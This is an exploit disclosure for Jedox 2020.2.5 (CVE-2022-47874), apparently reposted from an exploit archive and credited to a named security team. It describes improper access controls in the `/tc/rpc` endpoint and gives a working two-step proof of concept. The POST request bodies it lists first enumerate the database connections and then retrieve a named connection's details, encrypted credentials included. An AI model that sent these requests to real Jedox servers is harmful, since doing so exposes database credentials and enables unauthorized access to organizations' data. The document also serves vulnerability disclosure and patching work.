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Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls Vulnerability
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# Exploit Title: Jedox 2020.2.5 - Disclosure of Database Credentials via Improper Access Controls # Exploit Author: Team Syslifters / Christoph MAHRL, Aron MOLNAR, Patrick PIRKER and Michael WEDL # Vendor Homepage: https://jedox.com # Version: Jedox 2020.2 (20.2.5) and older # CVE : CVE-2022-47874 Introduction ================= Improper access controls in `/tc/rpc` allows remote authenticated users to view details of database connections via the class `com.jedox.etl.mngr.Connections` and the method `getGlobalConnection`. To exploit the vulnerability, the attacker must know the name of the database connection. Write-Up ================= See [Docs Syslifters](https://docs.syslifters.com/) for a detailed write-up on how to exploit vulnerability. Proof of Concept ================= 1) List all available database connections via `conn::ls` (see also: CVE-2022-47879): PATH: /be/rpc.php METHOD: POST BODY: [ [ "conn", "ls", [ null, false, true, [ "type", "active", "description" ] ] ] ] 2) Retrieve details of a database connection (specify connection name via CONNECTION) including encrypted credentials using the Java RPC function `com.jedox.etl.mngr.Connection::getGlobalConnection`: PATH: /tc/rpc METHOD: POST BODY: [ [ "com.jedox.etl.mngr.Connections", "getGlobalConnection", [ "<CONNECTION>" ] ] ] # 0day.today [2024-12-25] #